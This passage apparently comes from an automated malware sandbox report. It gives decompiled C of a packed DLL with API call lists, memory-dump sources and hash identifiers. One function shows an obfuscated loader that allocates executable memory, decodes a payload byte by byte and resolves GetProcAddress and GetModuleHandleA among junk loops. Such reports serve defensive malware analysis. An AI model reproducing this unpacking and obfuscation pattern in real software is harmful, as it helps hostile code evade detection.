                                                                                                                                    0x10002da5
                                                                                                                                    0x10002db0
                                                                                                                                    0x10002db4
                                                                                                                                    0x10002db9
                                                                                                                                    0x10002dbd
                                                                                                                                    0x10002dc3
                                                                                                                                    0x10002dc7
                                                                                                                                    0x10002dcd
                                                                                                                                    0x10002dd1
                                                                                                                                    0x10002dd6
                                                                                                                                    0x10002dda
                                                                                                                                    0x10002de0
                                                                                                                                    0x10002de4
                                                                                                                                    0x10002dea
                                                                                                                                    0x10002dee
                                                                                                                                    0x10002df3
                                                                                                                                    0x10002df7
                                                                                                                                    0x10002dfd
                                                                                                                                    0x10002e08
                                                                                                                                    0x10002e0c
                                                                                                                                    0x10002e1a
                                                                                                                                    0x10002e2d
                                                                                                                                    0x10002e50
                                                                                                                                    0x10002e65
                                                                                                                                    0x10002e80
                                                                                                                                    0x10002e86
                                                                                                                                    0x10002e86
                                                                                                                                    0x10002e86
                                                                                                                                    0x10002e98
                                                                                                                                    0x10002e9e
                                                                                                                                    0x10002eae
                                                                                                                                    0x10002eb0
                                                                                                                                    0x10002eb0
                                                                                                                                    0x10002ebd
                                                                                                                                    0x10002ebe
                                                                                                                                    0x10002ebf
                                                                                                                                    0x10002eca

                                                                                                                                    APIs
                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,CloseFarmhouse32,00000086,_DrawPossible64,00000086,?,?,000000C1,000000C1), ref: 10002CA7
                                                                                                                                    • closesocket.WS2_32(0000014A), ref: 10002CAE
                                                                                                                                    • CoRevokeClassObject.OLE32(0000014A), ref: 10002CB5
                                                                                                                                    • CoFileTimeNow.OLE32(?), ref: 10002CBC
                                                                                                                                    • CoInitializeSecurity.OLE32(?,?,?,?,000000C1,?,?,?,0000014A), ref: 10002CED
                                                                                                                                    • CreatePrivateObjectSecurity.KERNELBASE(?,0000014A,0000014A,?,0000014A,0000014A), ref: 10002D03
                                                                                                                                    • DisconnectNamedPipe.KERNELBASE(000000C1), ref: 10002D0E
                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,?,000000C1,000000C1), ref: 10002D64
                                                                                                                                    • EnumResourceTypesW.KERNEL32(?,?,000000C1), ref: 10002D77
                                                                                                                                    • LockFile.KERNEL32(?,?,0000014A,0000014A,0000014A), ref: 10002D8E
                                                                                                                                    • LookupPrivilegeDisplayNameA.ADVAPI32(?,?,?,000000C1,0000014A), ref: 10002E2D
                                                                                                                                    • ReadEventLogW.ADVAPI32(?,000000C1,000000C1,?,000000C1,?,000000C1), ref: 10002E50
                                                                                                                                    • SetupComm.KERNEL32(000000C1,0000014A,000000C1), ref: 10002E65
                                                                                                                                    • WriteFile.KERNELBASE(?,?,0000014A,0000014A,0000014A), ref: 10002E80
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.687872325.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.687869167.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687877691.000000001000A000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687880940.000000001000C000.00000008.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687883756.000000001000D000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687887976.0000000010010000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CreateEnumObjectResourceSecurity$ClassCommDisconnectDisplayEventInitializeLockLookupNameNamedNamesPipePrivatePrivilegeReadRevokeSetupTimeTypesWriteclosesocket
                                                                                                                                    • String ID: CloseFarmhouse32$EnumMicrophyte32$SeemNicotinamide32$StandMarmite$TakePenult32$_DrawPossible64
                                                                                                                                    • API String ID: 3842444896-1362671101
                                                                                                                                    • Opcode ID: 5dd8d1a8b6dd083af997c632291955c82987fad54249d7bf4b38c638d76e0795
                                                                                                                                    • Instruction ID: ebae14217037ee31ebf82a92329a745a2ec3e2602b48421e106ee894ce46e2ac
                                                                                                                                    • Opcode Fuzzy Hash: 5dd8d1a8b6dd083af997c632291955c82987fad54249d7bf4b38c638d76e0795
                                                                                                                                    • Instruction Fuzzy Hash: 9871A9B55083559FE304CF54C894CABBBF9FBD9740F008A1EF59583264E634E989CB62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100026C8, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 295memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                    			E100026C8(void* __ecx, short __edx, void* __ebp, void* _a24, void* _a28, char _a32, signed int _a148) {
				signed int _t23;
				void* _t24;
				short _t25;
				signed short _t27;
				short _t28;
				short _t29;
				short _t30;
				intOrPtr* _t31;
				signed int _t32;
				signed int _t34;
				signed int _t36;
				signed int _t37;
				char** _t38;
				intOrPtr _t39;
				intOrPtr _t40;
				signed int _t42;
				void* _t43;
				signed int _t47;
				signed int _t50;
				intOrPtr _t52;
				void* _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				char _t75;
				signed int _t76;
				intOrPtr _t78;
				signed int _t80;
				char** _t81;
				intOrPtr _t82;
				char** _t92;
				intOrPtr _t93;
				char** _t94;
				void* _t95;
				short _t97;
				void* _t98;
				void* _t100;
				signed char _t102;
				intOrPtr _t114;
				intOrPtr _t115;
				signed int _t120;
				signed short _t121;
				intOrPtr _t122;
				intOrPtr _t124;
				intOrPtr _t125;
				signed int _t131;
				intOrPtr _t132;
				signed int _t135;
				void* _t138;
				void* _t149;
				void* _t163;
				void* _t167;
				void* _t178;
				void* _t179;

				_t65 = __ecx;
				do {
					_t65 = _t65 - 1;
					 *0x1000e14e = __edx;
				} while (_t65 != 0);
				_t66 =  *0x1000e1a0; // 0x11e
				_t138 = _t66 -  *0x1000e324; // 0x1f2
				_t92 =  *0x1000f0d0; // 0x7c0000
				if(_t138 >= 0) {
					 *0x1000e1c0 = 0x8a;
				}
				_t92[1] = 0x331;
				_t92[2] = 0x9e3;
				_t23 =  *0x1000e264 & 0x0000ffff;
				_t67 =  *0x1000e1f8; // 0x1d8
				if(_t23 == 0x150) {
					_t132 =  *0x1000dffc; // 0x139
					while(_t67 == _t132) {
						_t23 = _t23 - 0xe1;
						_t67 = _t67 + 0xe1;
						 *0x1000df3f = 0x6a;
						if(_t23 == 0x150) {
							continue;
						}
						goto L8;
					}
				}
				L8:
				_t92[3] = 0x9000;
				_t93 =  *0x1000e134; // 0x8a
				_t24 = 0x76;
				_t68 = 0x76;
				if(_t93 <= 0x76) {
					_t131 =  *0x1000e3c8; // 0x140
					_t120 =  *0x1000e368; // 0x81
					while(_t68 == 0x76) {
						 *0x1000e33c = 0x32;
						if((_t120 ^ _t131) < _t68) {
							 *0x1000e1d8 = 0xd7;
						}
						_t24 = _t24 - 1;
						_t68 = _t68 + 1;
						if(_t24 >= _t93) {
							continue;
						}
						goto L14;
					}
				}
				L14:
				_t25 =  *0x1000e1ac;
				_t69 = 0x65;
				if(_t25 <= 0x1b) {
					while(_t69 >= 0xffbb) {
						_t25 = _t25 + 0x65;
						_t69 = _t69 - 1;
						 *0x1000ded4 = 0x88;
						if(_t25 <= 0x1b) {
							continue;
						}
						goto L18;
					}
				}
				L18:
				_t94 =  *0x1000f0d0; // 0x7c0000
				 *_t94 = "Erodium"; // executed
				_a24 = VirtualAlloc(0, 0x1e3c, 0x3000, 0x40);
				_t27 =  *0x1000e26c; // 0x10e
				_t149 = _t27 -  *0x1000e144; // 0x83
				if(_t149 < 0) {
					_t70 =  *0x1000dfc4; // 0xe27
				} else {
					_t70 = 0x8c;
					 *0x1000dfc4 = 0x8c;
				}
				_t28 =  *0x1000e184;
				while(_t28 == 0xa) {
					_t28 = _t28 - _t70;
					 *0x1000e28c = 1;
					 *0x1000e07e = 0x62;
					 *0x1000e338 = 0x7c;
				}
				_t29 =  *0x1000e03c;
				_t121 =  *0x1000e208; // 0x3b
				_a28 = 0;
				_t71 = 0x11;
				_t95 = 0x68;
				if(_t29 == 0xad) {
					while(_t121 == _t71 && _t95 >=  *0x1000e020) {
						_t29 = _t29 - 0x62;
						_t95 = _t95 - 1;
						_t121 = _t121 + 0x99;
						_t71 = 0x9b;
						 *0x1000e300 = 0x389;
						 *0x1000e208 = 0x2b;
						if(_t29 == 0xad) {
							continue;
						}
						goto L29;
					}
				}
				L29:
				_t30 =  *0x1000de8c;
				_t122 =  *0x1000e1a0; // 0x11e
				 *0x1000f0e0 =  &_a32;
				_t97 =  *0x1000e078;
				_t72 = 0xc4;
				if(_t30 <= _t97) {
					while(_t72 == 0xc4 && _t122 >=  *0x1000e3c4) {
						_t30 = _t30 + 1;
						_t122 = _t122 - 1;
						 *0x1000e0e0 = 0;
						 *0x1000e1d8 = 0x55;
						 *0x1000df3f = 0x1d;
						 *0x1000e14e = 0xd40;
						_t72 = 0xc5;
						if(_t30 <= _t97) {
							continue;
						}
						goto L34;
					}
				}
				L34:
				_t98 = _a28;
				do {
					_t31 =  *0x1000f0e0; // 0x30f8e8
					_t32 =  *0x1000f0e8; // 0x78f
					 *0x1000f0e8 = _t32 + 1;
					_t34 =  *0x1000e26c & 0x0000ffff;
					_t75 =  *((intOrPtr*)( *_t31 + _t32 * 4)) - 0x45907;
					while(_t34 == 0xbb) {
						_t34 = _t34 + 1;
						 *0x1000e388 = 0x42;
						 *0x1000e134 = 0xd9;
						 *0x1000e106 = 0xda;
						 *0x1000e2fc = 0x440;
					}
					 *((char*)(_t98 + _a24)) = _t75;
					_t98 = _t98 + 1;
				} while (_t98 < 0x78f);
				_t76 =  *0x1000debc; // 0x1e7
				_t163 = (_t76 ^ 0x000000c0) -  *0x1000e114; // 0x99
				if(_t163 <= 0) {
					 *0x1000ded4 = 0x2c;
				}
				_t36 =  *0x1000e188 & 0x0000ffff;
				while(_t36 == 0x859) {
					_t36 = _t36 + 1;
					 *0x1000e38c = 0xb2;
					 *0x1000e400 = 0xb1;
					 *0x1000e138 = 0x826;
				}
				_t37 =  *0x1000e208 & 0x0000ffff;
				_a24 = _a24 + 0xb2;
				_t78 =  *0x1000e040; // 0x16e
				_t100 = 9;
				if(_t37 <= 0x1f2) {
					while(1) {
						_t167 = _t100 -  *0x1000e108; // 0x51
						if(_t167 != 0 || _t78 != 0x298) {
							goto L49;
						}
						_t37 = _t37 + 1;
						_t100 = _t100 - 1;
						 *0x1000df3c = 0xae;
						 *0x1000e14e = 0x6b4;
						 *0x1000e07e = 0xd8;
						 *0x1000e1e0 = 0x55;
						_t78 = 0x299;
						if(_t37 <= 0x1f2) {
							continue;
						}
						goto L49;
					}
				}
				L49:
				_t38 =  *0x1000f0d0; // 0x7c0000
				_t38[5] = GetProcAddress;
				_t39 =  *0x1000df08; // 0x9f
				if(_t39 <= 0xbb) {
					_t50 = (0xb81702e1 * (0x000000bb - _t39 & 0x0000ffff) >> 0x00000020 >> 0x00000007) + 0x00000001 & 0x0000ffff;
					do {
						_t50 = _t50 - 1;
						 *0x1000dfb4 = 0x54;
						 *0x1000dfc4 = 0xe27;
						 *0x1000e07e = 0x82;
						 *0x1000df3f = 0x87;
					} while (_t50 != 0);
				}
				_t40 =  *0x1000e350; // 0x13a
				_t80 =  *0x1000e100 & 0x0000ffff;
				 *0x1000f0dc = _a24;
				if(_t40 <= 0xc6) {
					while(_t80 == 0x67) {
						_t40 = _t40 + 1;
						 *0x1000e1d8 = 0xcc;
						 *0x1000e14c = 0xd6b;
						 *0x1000e28c = 0x2b4;
						 *0x1000dfb4 = 0x98;
						_t80 = 0x66;
						if(_t40 <= 0xc6) {
							continue;
						}
						goto L56;
					}
				}
				L56:
				_t42 =  *0x1000ded4 & 0x0000ffff;
				if(_t42 >= 0x136) {
					_t47 = _t42 + 0xfffffecb & 0x0000ffff;
					do {
						_t47 = _t47 - 1;
						 *0x1000e210 = 0xa0;
						 *0x1000e07d = 0xa8;
						 *0x1000e138 = 0xa4;
						 *0x1000e12c = 0x837;
					} while (_t47 != 0);
				}
				_t81 =  *0x1000f0d0; // 0x7c0000
				_t102 = GetModuleHandleA;
				_t81[6] = GetModuleHandleA;
				_t82 =  *0x1000e350; // 0x13a
				_t43 = 0xffffffc9;
				_t178 =  *0x1000df00 - _t43; // 0x129
				if(_t178 == 0) {
					_t125 =  *0x1000dfcc; // 0x29
					_t115 =  *0x1000e020; // 0x19c
					_t102 =  *0x1000e10f; // -76
					while(1) {
						_t179 = _t82 -  *0x1000df94; // 0x88
						if(_t179 > 0) {
							goto L65;
						}
						 *0x1000df35 = 0xb5;
						 *0x1000ded7 = 0x1b;
						 *0x1000e290 = 0xad;
						 *0x1000ded6 = 0xd1;
						if((_t102 ^  *0x1000e22c) <= _t125) {
							 *0x1000e07e = 0xb1;
						}
						_t43 = _t43 + _t115;
						_t82 = _t82 + 0x28;
						if(_t43 == 0xffffffc9) {
							continue;
						}
						goto L65;
					}
				}
				L65:
				_pop(_t114);
				_pop(_t124);
				_pop(_t52);
				return E10002ECD(0xb2, _t52, _a148 ^ _t135, _t102, _t114, _t124);
			}





























































                                                                                                                                    0x100026c8
                                                                                                                                    0x100026d0
                                                                                                                                    0x100026d0
                                                                                                                                    0x100026d3
                                                                                                                                    0x100026d3
                                                                                                                                    0x100026dc
                                                                                                                                    0x100026e2
                                                                                                                                    0x100026e8
                                                                                                                                    0x100026ee
                                                                                                                                    0x100026f0
                                                                                                                                    0x100026f0
                                                                                                                                    0x100026fa
                                                                                                                                    0x10002701
                                                                                                                                    0x10002708
                                                                                                                                    0x10002713
                                                                                                                                    0x10002719
                                                                                                                                    0x1000271b
                                                                                                                                    0x10002723
                                                                                                                                    0x10002727
                                                                                                                                    0x1000272c
                                                                                                                                    0x10002736
                                                                                                                                    0x1000273c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000273c
                                                                                                                                    0x10002723
                                                                                                                                    0x1000273e
                                                                                                                                    0x1000273e
                                                                                                                                    0x10002745
                                                                                                                                    0x1000274b
                                                                                                                                    0x10002752
                                                                                                                                    0x10002754
                                                                                                                                    0x10002756
                                                                                                                                    0x1000275c
                                                                                                                                    0x10002762
                                                                                                                                    0x1000276f
                                                                                                                                    0x10002779
                                                                                                                                    0x1000277b
                                                                                                                                    0x1000277b
                                                                                                                                    0x10002785
                                                                                                                                    0x1000278b
                                                                                                                                    0x10002790
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002790
                                                                                                                                    0x10002762
                                                                                                                                    0x10002792
                                                                                                                                    0x10002792
                                                                                                                                    0x1000279c
                                                                                                                                    0x100027a1
                                                                                                                                    0x100027a5
                                                                                                                                    0x100027ab
                                                                                                                                    0x100027ae
                                                                                                                                    0x100027b4
                                                                                                                                    0x100027ba
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x100027ba
                                                                                                                                    0x100027a5
                                                                                                                                    0x100027bc
                                                                                                                                    0x100027bc
                                                                                                                                    0x100027d0
                                                                                                                                    0x100027da
                                                                                                                                    0x100027de
                                                                                                                                    0x100027e4
                                                                                                                                    0x100027eb
                                                                                                                                    0x100027fa
                                                                                                                                    0x100027ed
                                                                                                                                    0x100027ed
                                                                                                                                    0x100027f2
                                                                                                                                    0x100027f2
                                                                                                                                    0x10002800
                                                                                                                                    0x1000280a
                                                                                                                                    0x10002820
                                                                                                                                    0x10002825
                                                                                                                                    0x1000282b
                                                                                                                                    0x10002832
                                                                                                                                    0x10002832
                                                                                                                                    0x1000283a
                                                                                                                                    0x10002846
                                                                                                                                    0x1000284c
                                                                                                                                    0x10002854
                                                                                                                                    0x10002859
                                                                                                                                    0x1000285e
                                                                                                                                    0x10002870
                                                                                                                                    0x1000287f
                                                                                                                                    0x10002882
                                                                                                                                    0x10002885
                                                                                                                                    0x10002890
                                                                                                                                    0x10002895
                                                                                                                                    0x1000289b
                                                                                                                                    0x100028a1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x100028a1
                                                                                                                                    0x10002870
                                                                                                                                    0x100028a3
                                                                                                                                    0x100028a3
                                                                                                                                    0x100028aa
                                                                                                                                    0x100028b4
                                                                                                                                    0x100028ba
                                                                                                                                    0x100028c3
                                                                                                                                    0x100028c8
                                                                                                                                    0x100028d1
                                                                                                                                    0x100028e4
                                                                                                                                    0x100028e7
                                                                                                                                    0x100028ec
                                                                                                                                    0x100028f3
                                                                                                                                    0x100028fd
                                                                                                                                    0x10002903
                                                                                                                                    0x1000290a
                                                                                                                                    0x1000290f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000290f
                                                                                                                                    0x100028d1
                                                                                                                                    0x10002911
                                                                                                                                    0x10002911
                                                                                                                                    0x10002924
                                                                                                                                    0x10002924
                                                                                                                                    0x1000292b
                                                                                                                                    0x10002936
                                                                                                                                    0x1000293b
                                                                                                                                    0x10002942
                                                                                                                                    0x1000294c
                                                                                                                                    0x10002950
                                                                                                                                    0x10002957
                                                                                                                                    0x10002961
                                                                                                                                    0x10002967
                                                                                                                                    0x1000296e
                                                                                                                                    0x1000296e
                                                                                                                                    0x1000297a
                                                                                                                                    0x1000297d
                                                                                                                                    0x10002980
                                                                                                                                    0x10002988
                                                                                                                                    0x10002994
                                                                                                                                    0x1000299a
                                                                                                                                    0x1000299c
                                                                                                                                    0x1000299c
                                                                                                                                    0x100029ab
                                                                                                                                    0x100029b2
                                                                                                                                    0x100029c0
                                                                                                                                    0x100029c7
                                                                                                                                    0x100029d1
                                                                                                                                    0x100029d8
                                                                                                                                    0x100029d8
                                                                                                                                    0x100029e0
                                                                                                                                    0x100029e7
                                                                                                                                    0x100029f3
                                                                                                                                    0x100029f9
                                                                                                                                    0x100029fe
                                                                                                                                    0x10002a07
                                                                                                                                    0x10002a07
                                                                                                                                    0x10002a0e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002a18
                                                                                                                                    0x10002a1b
                                                                                                                                    0x10002a22
                                                                                                                                    0x10002a28
                                                                                                                                    0x10002a2f
                                                                                                                                    0x10002a36
                                                                                                                                    0x10002a40
                                                                                                                                    0x10002a45
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002a45
                                                                                                                                    0x10002a07
                                                                                                                                    0x10002a47
                                                                                                                                    0x10002a47
                                                                                                                                    0x10002a52
                                                                                                                                    0x10002a55
                                                                                                                                    0x10002a5e
                                                                                                                                    0x10002a78
                                                                                                                                    0x10002a90
                                                                                                                                    0x10002a90
                                                                                                                                    0x10002a93
                                                                                                                                    0x10002a99
                                                                                                                                    0x10002a9f
                                                                                                                                    0x10002aa5
                                                                                                                                    0x10002aa5
                                                                                                                                    0x10002a90
                                                                                                                                    0x10002aad
                                                                                                                                    0x10002abb
                                                                                                                                    0x10002ac2
                                                                                                                                    0x10002ac8
                                                                                                                                    0x10002ae0
                                                                                                                                    0x10002ae6
                                                                                                                                    0x10002aee
                                                                                                                                    0x10002af4
                                                                                                                                    0x10002afb
                                                                                                                                    0x10002b01
                                                                                                                                    0x10002b07
                                                                                                                                    0x10002b0c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002b0c
                                                                                                                                    0x10002ae0
                                                                                                                                    0x10002b0e
                                                                                                                                    0x10002b16
                                                                                                                                    0x10002b1d
                                                                                                                                    0x10002b24
                                                                                                                                    0x10002b40
                                                                                                                                    0x10002b40
                                                                                                                                    0x10002b43
                                                                                                                                    0x10002b49
                                                                                                                                    0x10002b4f
                                                                                                                                    0x10002b55
                                                                                                                                    0x10002b55
                                                                                                                                    0x10002b40
                                                                                                                                    0x10002b5d
                                                                                                                                    0x10002b63
                                                                                                                                    0x10002b69
                                                                                                                                    0x10002b6c
                                                                                                                                    0x10002b72
                                                                                                                                    0x10002b77
                                                                                                                                    0x10002b7d
                                                                                                                                    0x10002b7f
                                                                                                                                    0x10002b85
                                                                                                                                    0x10002b8c
                                                                                                                                    0x10002b92
                                                                                                                                    0x10002b92
                                                                                                                                    0x10002b98
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002ba3
                                                                                                                                    0x10002bac
                                                                                                                                    0x10002bb3
                                                                                                                                    0x10002bbd
                                                                                                                                    0x10002bc4
                                                                                                                                    0x10002bc6
                                                                                                                                    0x10002bc6
                                                                                                                                    0x10002bd0
                                                                                                                                    0x10002bd2
                                                                                                                                    0x10002bd8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002bd8
                                                                                                                                    0x10002b92
                                                                                                                                    0x10002bda
                                                                                                                                    0x10002be1
                                                                                                                                    0x10002be2
                                                                                                                                    0x10002be3
                                                                                                                                    0x10002bf3

                                                                                                                                    APIs
                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00001E3C,00003000,00000040), ref: 100027D6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.687872325.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.687869167.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687877691.000000001000A000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687880940.000000001000C000.00000008.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687883756.000000001000D000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687887976.0000000010010000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID: Erodium
                                                                                                                                    • API String ID: 4275171209-1155451227
                                                                                                                                    • Opcode ID: 97ef0320dc4bb16d87dc74a1437d1f0f39f06b34618ba54a91317ffb8219f6f9
                                                                                                                                    • Instruction ID: 35d30773ef3168207c4a7e23db3de7a99f47d43d62763af8d473a69d80a2f7a0
                                                                                                                                    • Opcode Fuzzy Hash: 97ef0320dc4bb16d87dc74a1437d1f0f39f06b34618ba54a91317ffb8219f6f9
                                                                                                                                    • Instruction Fuzzy Hash: 3BC1ED759052E28BF314CF28CCD03693BA1F7943D0F54852AC985AB3AED7B99D81CB52
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10004445, Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E10004445(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x1000f594 = _t6;
				if(_t6 != 0) {
					_t7 = E100043EA(__eflags);
					__eflags = _t7 - 3;
					 *0x1000fb80 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E10005DE8(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x1000f594);
							 *0x1000f594 =  *0x1000f594 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}






                                                                                                                                    0x10004456
                                                                                                                                    0x1000445e
                                                                                                                                    0x10004463
                                                                                                                                    0x10004468
                                                                                                                                    0x1000446d
                                                                                                                                    0x10004470
                                                                                                                                    0x10004475
                                                                                                                                    0x1000449b
                                                                                                                                    0x1000449d
                                                                                                                                    0x1000449e
                                                                                                                                    0x10004477
                                                                                                                                    0x1000447c
                                                                                                                                    0x10004481
                                                                                                                                    0x10004484
                                                                                                                                    0x00000000
                                                                                                                                    0x10004486
                                                                                                                                    0x1000448c
                                                                                                                                    0x10004492
                                                                                                                                    0x00000000
                                                                                                                                    0x10004492
                                                                                                                                    0x10004484
                                                                                                                                    0x10004465
                                                                                                                                    0x10004465
                                                                                                                                    0x10004467
                                                                                                                                    0x10004467

                                                                                                                                    APIs
                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,10002F90,00000001,?,?,00000001,?,?,1000310E,00000001,?,?,1000B390,0000000C), ref: 10004456
                                                                                                                                    • HeapDestroy.KERNEL32(?,?,00000001,?,?,1000310E,00000001,?,?,1000B390,0000000C,100031C8,?), ref: 1000448C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.687872325.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.687869167.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687877691.000000001000A000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687880940.000000001000C000.00000008.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687883756.000000001000D000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687887976.0000000010010000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Heap$CreateDestroy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3296620671-0
                                                                                                                                    • Opcode ID: 064172fa8dc419076757cafe7ee1cc7a72132e51f9dbf521579e7f1264d808c8
                                                                                                                                    • Instruction ID: cf8fcad55ee25d0691a6aa256800d2603331258143bc29d739b87b307630a09c
                                                                                                                                    • Opcode Fuzzy Hash: 064172fa8dc419076757cafe7ee1cc7a72132e51f9dbf521579e7f1264d808c8
                                                                                                                                    • Instruction Fuzzy Hash: F6E092B5659352EEF704EF308D4A72636D4E7447C7F02883AF908C50ACEFB08940B605
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 100019C0, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 111memoryfileencryptionCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                    			E100019C0(void* __ebp) {
				signed int _v4;
				short _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v34;
				short _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				struct tagRECT _v64;
				struct tagRECT _v80;
				struct tagRECT _v96;
				void* __edi;
				signed int _t18;
				intOrPtr _t20;
				char _t21;
				char _t24;
				intOrPtr _t25;
				char _t31;
				void* _t40;
				void* _t41;
				char _t44;
				char _t46;
				signed int _t52;
				char _t53;
				intOrPtr _t55;
				char _t56;
				intOrPtr _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				long* _t66;
				void* _t69;

				_t63 = __ebp;
				_t18 =  *0x1000e420; // 0x44ea7bf2
				_v4 = _t18 ^ _t66;
				if( *0x1000e350 == 0x1652) {
					_t53 = "potasto32"; // 0x61746f70
					_t44 = "leCapotasto32"; // 0x6143656c
					_t24 = "EnableCapotasto32"; // 0x62616e45
					_v16 = _t53;
					_v20 = _t44;
					_v24 = _t24;
					_t25 =  *0x1000a1ac; // 0x336f7473
					_v12 = _t25;
					_v8 =  *0x1000a1b0 & 0x0000ffff;
					__imp__CertOpenSystemStoreA(0x1000e108,  &_v24);
					EqualSid(0x1000e106, 0x1000e106);
					FlushFileBuffers(0x1000e106);
					GetWindowThreadProcessId(0x1000e104, 0x1000e106);
					ReleaseSemaphore(0x1000e2d4, 0x1000e104, _t66);
					_t31 = "adrace"; // 0x61726461
					_t46 = "RemoveHeadrace"; // 0x6f6d6552
					_t55 = M1000A194; // 0x65486576
					_v40 = _t31;
					_v48 = _t46;
					_v44 = _t55;
					_t56 =  *0x1000a19e; // 0x0
					_v36 =  *0x1000a19c & 0x0000ffff;
					_v34 = _t56;
					LoadBitmapA(0x1000e104,  &_v48);
					ScrollDC(0x1000e2d4,  *0x1000e2d4,  *0x1000e2d4,  &_v64,  &_v80, 0x1000e104,  &_v96);
					SetScrollPos(0x1000e2d4,  *0x1000e108,  *0x1000e2d4, 0x1000e2d4);
					HeapDestroy(0x1000e108);
					ReadFile(0x1000e108, 0x1000e2d4,  *0x1000e2d4, 0x1000e2d4, 0x1000e2d4);
				}
				_t20 =  *0x1000e39c; // 0xd3
				if(_t20 <  *0x1000de8c) {
					 *0x1000de7c = 0x266;
				}
				_t69 =  *0x1000e364 - _t20; // 0x47
				if(_t69 < 0) {
					 *0x1000e07d = 0x46;
				}
				_t52 =  *0x1000dfcc & 0x0000ffff;
				_t21 =  *0x1000e07e;
				_push(_t63);
				_t60 =  *0x1000e100; // 0x167
				_t41 = 0xa6;
				while(_t52 >= 0xcea || _t41 >= 0x164 && _t21 >= _t60) {
					_t21 = _t21 - 1;
					_t41 = _t41 - 0x7a;
					 *0x1000e0c4 = 0x50;
					 *0x1000e3a4 = 0x98;
					_t52 = _t52 - 1;
				}
				_pop(_t61);
				return E10002ECD(0xa17, _t40, _v4 ^ _t66, _t52, _t61, _t62);
			}






































                                                                                                                                    0x100019c0
                                                                                                                                    0x100019c3
                                                                                                                                    0x100019ca
                                                                                                                                    0x100019d8
                                                                                                                                    0x100019de
                                                                                                                                    0x100019e4
                                                                                                                                    0x100019ea
                                                                                                                                    0x100019ef
                                                                                                                                    0x100019f3
                                                                                                                                    0x10001a02
                                                                                                                                    0x10001a06
                                                                                                                                    0x10001a11
                                                                                                                                    0x10001a15
                                                                                                                                    0x10001a1a
                                                                                                                                    0x10001a2a
